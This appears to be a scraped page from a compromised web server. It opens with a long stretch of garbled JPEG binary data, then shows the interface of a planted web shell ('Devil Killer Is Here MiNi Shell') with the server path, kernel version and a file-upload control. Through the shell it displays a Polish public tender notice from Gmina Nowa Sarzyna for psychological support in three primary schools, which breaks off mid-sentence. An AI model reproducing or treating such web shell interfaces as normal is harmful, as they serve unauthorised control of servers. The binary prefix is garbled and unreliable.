JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220207/0004912202-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług w zakresie wsparcia psychologicznego w następujących placówkach: Szkole Podstawowej w Sarzynie, Szkole Podstawowej w Rudzie Łańcuckiej oraz Szkole Podstawowej w Łętowni </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA NOWA SARZYNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581749</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Mikołaja Kopernika 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowa Sarzyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-310</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@nowasarzyna.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.nowasarzyna.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług w zakresie wsparcia psychologicznego w następujących placówkach: Szkole Podstawowej w Sarzynie, Szkole Podstawowej w Rudzie Łańcuckiej oraz Szkole Podstawowej w Łętowni </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d92ca327-87ee-11ec-94c8-de8df8ed9da1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00049122</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn.: „Dostępna szkoła – innowacyjne rozwiązania w kreowaniu przyjaznej przestrzeni edukacyjnej z uwzględnieniem potrzeb uczniów oraz otoczenia” współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Wiedza Edukacja Rozwój </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl,<br/>https://epuap.gov.pl/wps/portal<br/>e-mail: zamowienia@nowasarzyna.eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu:<br/>a) miniPortalu dostępnego pod adresem: https://miniportal.uzp.gov.pl, <br/>b) ePUAPu, który jest dostępny pod adresem: https://epuap.gov.pl/wps/portal oraz <br/>c) poczty elektronicznej: zamowienia@nowasarzyna.eu<br/><br/>2. Wnioski, zawiadomienia oraz informacje (zwane dalej ogólnie „korespondencją”) Zamawiający i Wykonawcy przekazują powołując się na numer ogłoszenia (BZP) lub numerem referencyjnym postępowania.<br/>1) za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji),<br/>2) drogą elektroniczną na adres: zamowienia@nowasarzyna.eu, z wyjątkiem oferty oraz dokumentów składanych wraz z ofertą (wymagających szyfrowania), które należy składać wyłącznie w sposób wskazany w pkt. 13.2 ppkt 1 SWZ.<br/><br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na PUAP ma dostęp do następujących formularzy: „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularza do komunikacji”.<br/><br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/><br/>5. Regulamin korzystania z systemu miniPortal jest dostępny pod adresem: https://miniportal.uzp.gov.pl/WarunkiUslugi. Natomiast warunki korzystania z elektronicznej platformy usług administracji publicznej (ePUAP) są dostępne pod adresem: https://www.gov.pl/web/gov/warunki-korzystania.<br/><br/>6. Wykonawca ubiegając się o udzielenie zamówienia, w szczególności składając ofertę, akceptuje zasady korzystania z systemu miniPortal wskazane w SWZ oraz Instrukcji użytkownika dostępnej pod adresem: https://miniportal.uzp.gov.pl/Instrukcje.<br/><br/>7. W celu korzystania z systemu miniPortal konieczne jest dysponowanie przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa tylko na platformie Windows i wymaga .NET Framework 4.5. W przyp. korzystania z urządzeń mobilnych oraz Mac lub Linux, dostęp do wszystkich funkcjonalności systemu może być ograniczony.<br/><br/>8. Specyfikacja połączenia, formatu przesyłania danych oraz kodowania i oznaczenia czasu odbioru danych:<br/>a) specyfikacja połączenia - Formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>b) format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem UTF-8,<br/>c) oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i dane zapisywane są z dokładnością co do setnej części sekundy,<br/>d) integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP. W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP Zamawiającego automatycznie generuje Rodzaj Urzędowego Poświadczenia Odbioru czyli Urzędowe Poświadczenie Przedłożenia (UPP), które jest powiązane z wysyłanym dokum. W UPP w sekcji „Dane poświadczenia” jest zawarta informacja o dacie doręczenia.<br/><br/>9. System dostępny jest za pośrednictwem nast. przeglądarek internetowych:<br/>1) Microsoft Internet Explorer od wersji 11.0;<br/>2) Mozilla Firefox od wersji 15;<br/>3) Google Chrome od wersji 20;<br/>4) Microsoft Edge.<br/><br/>10. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty” i „Formularza do komunikacji” wynosi 150 MB.<br/><br/>11. Zasady składania oferty zamieszczono w rozdziale 18 SWZ.<br/><br/>12. Za datę przekazania oferty, wraz z załącznikami przyjmuje się datę ich przekazania na ePUAP.<br/><br/>13. Ze względu na ograniczoną liczbę znaków, które można wprowadzić do treści ogłoszenia, pozostałe informacje zawarto w rozdziale 13 SWZ dostępnym na stronie prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)2016/679z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia Dyrektywy95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1) zawarta jest w rozdziale 28 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Świadczenie usług w zakresie wsparcia psychologicznego w Szkole Podstawowej im. ks. Stefana Kardynała Wyszyńskiego w Sarzynie”<br/><br/>1. Przedmiotem zamówienia jest świadczenie usług w zakresie wsparcia psychologicznego, polegające na wykonywaniu zadań wynikających z Rozporządzenia Ministra Edukacji Narodowej z 9 sierpnia 2017 r. w sprawie zasad organizacji i udzielania pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach (Dz. U. z 2020 r. poz. 1280) w Szkole Podstawowej im. ks. Stefana Kardynała Wyszyńskiego w Sarzynie w wymiarze 10h tygodniowo przez ok. 40 tygodni w okresie realizacji projektu.<br/><br/>2. Świadczenie usług odbywać się będzie od poniedziałku do piątku, według planu ustalonego przez dyrektora szkoły z wyłączeniem ferii, wakacji, dni opiekuńczych i innych wolnych od zajęć dydaktycznych. <br/><br/>3. W przypadku niemożliwości zrealizowania przez Wykonawcę umowy zgodnie z ustalonym planem, spowodowanej usprawiedliwioną nieobecnością udokumentowaną zwolnieniem lekarskim lub innym dokumentem urzędowym Wykonawca jest zobowiązany do odpracowania ilości godzin równej nieodbytym zajęciom, w terminie uzgodnionym z dyrektorem szkoły. Dopuszcza się odpracowanie przez Wykonawcę niezrealizowanych godzin w innych przypadkach w terminach ustalonych z dyrektorem szkoły. <br/><br/>4. Wykonawca zobowiązany będzie zapewnić porządek podczas realizacji umowy, bezpieczeństwo uczniów korzystających ze świadczonych przez Wykonawcę usług oraz zgodne z przeznaczeniem użytkowanie sprzętu, materiałów i pomocy dydaktycznych.<br/><br/>5.	Zamawiający, dyrektor szkoły oraz inne upoważnione instytucje mają prawo do dokonania kontroli przebiegu i sposobu prowadzenia zajęć. <br/><br/>6.	Zadania psychologa szkolnego: <br/>1)	prowadzenie badań i działań diagnostycznych uczniów, w tym diagnozowanie indywidualnych potrzeb rozwojowych i edukacyjnych oraz możliwości psychofizycznych uczniów w celu określenia przyczyn niepowodzeń edukacyjnych oraz wspieranie mocnych stron uczniów; <br/>2)	diagnozowanie sytuacji wychowawczych w szkole w celu rozwiązywania problemów wychowawczych oraz wspierania rozwoju uczniów; <br/>3)	udzielanie pomocy psychologiczno-pedagogicznej w formach odpowiednich do rozpoznanych potrzeb; <br/>4)	podejmowanie działań z zakresu profilaktyki uzależnień i innych problemów dzieci i młodzieży; <br/>5)	minimalizowanie skutków zaburzeń rozwojowych, zapobieganie zaburzeniom zachowania oraz inicjowanie różnych form pomocy w środowisku szkolnym i pozaszkolnym uczniów; <br/>6)	inicjowanie i prowadzenie działań mediacyjnych i interwencyjnych w sytuacjach kryzysowych; <br/>7)	pomoc rodzicom i nauczycielom w rozpoznawaniu i rozwijaniu indywidualnych możliwości, predyspozycji i uzdolnień uczniów; <br/>8)	wspieranie nauczycieli, wychowawców grup wychowawczych i innych specjalistów w udzielaniu pomocy psychologiczno-pedagogicznej; <br/>9)	psycholog będzie odpowiadał za przygotowanie, realizację i dokumentację spotkań z uczniami; <br/>10)	prowadzenie dokumentacji obowiązującej w szkole – dziennik pracy psychologa szkolnego, plan pracy psychologa szkolnego, teczki uczniów, karty diagnoz; <br/>11)	sporządzanie sprawozdań z pracy – za I i II okres roku szkolnego i na zakończenie pracy w placówce; <br/>12)	realizacja zadań opiekuńczych; <br/>13)	inne zadania zlecone przez dyrektora szkoły; <br/>14)	udział w pracach zespołów nauczycieli i specjalistów pracujących z uczniami; <br/>15)	dokonywanie wielospecjalistycznej oceny poziomu funkcjonowania uczniów; <br/>16)	współpraca z nauczycielami, wychowawcami i specjalistami w zakresie przygotowania się do zajęć, przygotowywanie materiałów i pomocy do zajęć; <br/>17)	sporządzanie sprawozdań z realizacji zadań; <br/>18)	przestrzeganie przepisów prawa oświatowego i regulaminów obowiązujących w szkole oraz przepisów bhp; <br/>19)	przestrzeganie przepisów o ochronie danych osobowych;<br/>20)	szczegółowy zakres obowiązków ujęty został w projekcie umowy, stanowiącym załącznik do SWZ; <br/>21)	psycholog zobowiązany będzie posiadać wszelkie niezbędne materiały dydaktyczne; <br/>22)	w przypadku wprowadzenia w szkole nauczania zdalnego lub hybrydowego zatrudnionego obowiązuje realizacja wszystkich zadań w trybie zdalnym. <br/><br/>7.	Rozliczenie godzin pracy psychologa następować będzie w cyklu miesięcznym na podstawie dziennika zajęć.<br/><br/>8.	Sposób realizacji umowy (zdalnie/stacjonarnie) w okresie pandemii może ulec zmianie, ostateczna decyzja należeć będzie do dyrektora danej szkoły. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121270-6 - Usługi psychiatryczne lub psychologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-02-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert przyznając punkty w oparciu o<br/>następujące kryteria oceny ofert:<br/>1) Cena – (C) – waga 100%.<br/><br/>2. Zasady oceny za kryterium „Cena”:<br/>1) Punkty za kryterium „Cena” (C) zostaną obliczone w następujący sposób:C = <br/><br/>C(of. min) / C(of. bad) × 100 pkt<br/><br/>gdzie:<br/>C – ilość punktów, jakie otrzyma badana oferta za kryterium „Cena”,<br/>C(of. min) – najniższa cena spośród ofert nie podlegających odrzuceniu,<br/>C(of. bad) – cena oferty badanej.<br/><br/>2) Zamawiający do oceny kryterium „Cena – (C)” pobierze dane z oferty Wykonawcy.<br/>3) W kryterium „Cena” oferta z najniższą ceną otrzyma 100 pkt. natomiast pozostałe oferty po<br/>przeliczeniu zgodnie z powyższym wzorem odpowiednio mniej.<br/><br/>3. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Świadczenie usług w zakresie wsparcia psychologicznego w Szkole Podstawowej w Rudzie Łańcuckiej”<br/><br/>1. Przedmiotem zamówienia jest świadczenie usług w zakresie wsparcia psychologicznego, polegające na wykonywaniu zadań wynikających z Rozporządzenia Ministra Edukacji Narodowej z 9 sierpnia 2017 r. w sprawie zasad organizacji i udzielania pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach (Dz. U. z 2020 r. poz. 1280) w Szkole Podstawowej w Rudzie Łańcuckiej w wymiarze 5h tygodniowo przez ok. 40 tygodni w okresie realizacji projektu.<br/><br/>2. Świadczenie usług odbywać się będzie od poniedziałku do piątku, według planu ustalonego przez dyrektora szkoły z wyłączeniem ferii, wakacji, dni opiekuńczych i innych wolnych od zajęć dydaktycznych. <br/><br/>3. W przypadku niemożliwości zrealizowania przez Wykonawcę umowy zgodnie z ustalonym planem, spowodowanej usprawiedliwioną nieobecnością udokumentowaną zwolnieniem lekarskim lub innym dokumentem urzędowym Wykonawca jest zobowiązany do odpracowania ilości godzin równej nieodbytym zajęciom, w terminie uzgodnionym z dyrektorem szkoły. Dopuszcza się odpracowanie przez Wykonawcę niezrealizowanych godzin w innych przypadkach w terminach ustalonych z dyrektorem szkoły. <br/><br/>4. Wykonawca zobowiązany będzie zapewnić porządek podczas realizacji umowy, bezpieczeństwo uczniów korzystających ze świadczonych przez Wykonawcę usług oraz zgodne z przeznaczeniem użytkowanie sprzętu, materiałów i pomocy dydaktycznych.<br/><br/>5.	Zamawiający, dyrektor szkoły oraz inne upoważnione instytucje mają prawo do dokonania kontroli przebiegu i sposobu prowadzenia zajęć. <br/><br/>6.	Zadania psychologa szkolnego: <br/>1)	prowadzenie badań i działań diagnostycznych uczniów, w tym diagnozowanie indywidualnych potrzeb rozwojowych i edukacyjnych oraz możliwości psychofizycznych uczniów w celu określenia przyczyn niepowodzeń edukacyjnych oraz wspieranie mocnych stron uczniów; <br/>2)	diagnozowanie sytuacji wychowawczych w szkole w celu rozwiązywania problemów wychowawczych oraz wspierania rozwoju uczniów; <br/>3)	udzielanie pomocy psychologiczno-pedagogicznej w formach odpowiednich do rozpoznanych potrzeb; <br/>4)	podejmowanie działań z zakresu profilaktyki uzależnień i innych problemów dzieci i młodzieży; <br/>5)	minimalizowanie skutków zaburzeń rozwojowych, zapobieganie zaburzeniom zachowania oraz inicjowanie różnych form pomocy w środowisku szkolnym i pozaszkolnym uczniów; <br/>6)	inicjowanie i prowadzenie działań mediacyjnych i interwencyjnych w sytuacjach kryzysowych; <br/>7)	pomoc rodzicom i nauczycielom w rozpoznawaniu i rozwijaniu indywidualnych możliwości, predyspozycji i uzdolnień uczniów; <br/>8)	wspieranie nauczycieli, wychowawców grup wychowawczych i innych specjalistów w udzielaniu pomocy psychologiczno-pedagogicznej; <br/>9)	psycholog będzie odpowiadał za przygotowanie, realizację i dokumentację spotkań z uczniami; <br/>10)	prowadzenie dokumentacji obowiązującej w szkole – dziennik pracy psychologa szkolnego, plan pracy psychologa szkolnego, teczki uczniów, karty diagnoz; <br/>11)	sporządzanie sprawozdań z pracy – za I i II okres roku szkolnego i na zakończenie pracy w placówce; <br/>12)	realizacja zadań opiekuńczych; <br/>13)	inne zadania zlecone przez dyrektora szkoły; <br/>14)	udział w pracach zespołów nauczycieli i specjalistów pracujących z uczniami; <br/>15)	dokonywanie wielospecjalistycznej oceny poziomu funkcjonowania uczniów; <br/>16)	współpraca z nauczycielami, wychowawcami i specjalistami w zakresie przygotowania się do zajęć, przygotowywanie materiałów i pomocy do zajęć; <br/>17)	sporządzanie sprawozdań z realizacji zadań; <br/>18)	przestrzeganie przepisów prawa oświatowego i regulaminów obowiązujących w szkole oraz przepisów bhp; <br/>19)	przestrzeganie przepisów o ochronie danych osobowych;<br/>20)	szczegółowy zakres obowiązków ujęty został w projekcie umowy, stanowiącym załącznik do SWZ; <br/>21)	psycholog zobowiązany będzie posiadać wszelkie niezbędne materiały dydaktyczne; <br/>22)	w przypadku wprowadzenia w szkole nauczania zdalnego lub hybrydowego zatrudnionego obowiązuje realizacja wszystkich zadań w trybie zdalnym. <br/><br/>7.	Rozliczenie godzin pracy psychologa następować będzie w cyklu miesięcznym na podstawie dziennika zajęć.<br/><br/>8.	Sposób realizacji umowy (zdalnie/stacjonarnie) w okresie pandemii może ulec zmianie, ostateczna decyzja należeć będzie do dyrektora danej szkoły. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121270-6 - Usługi psychiatryczne lub psychologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-02-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert przyznając punkty w oparciu o<br/>następujące kryteria oceny ofert:<br/>1) Cena – (C) – waga 100%.<br/><br/>2. Zasady oceny za kryterium „Cena”:<br/>1) Punkty za kryterium „Cena” (C) zostaną obliczone w następujący sposób:C = <br/><br/>C(of. min) / C(of. 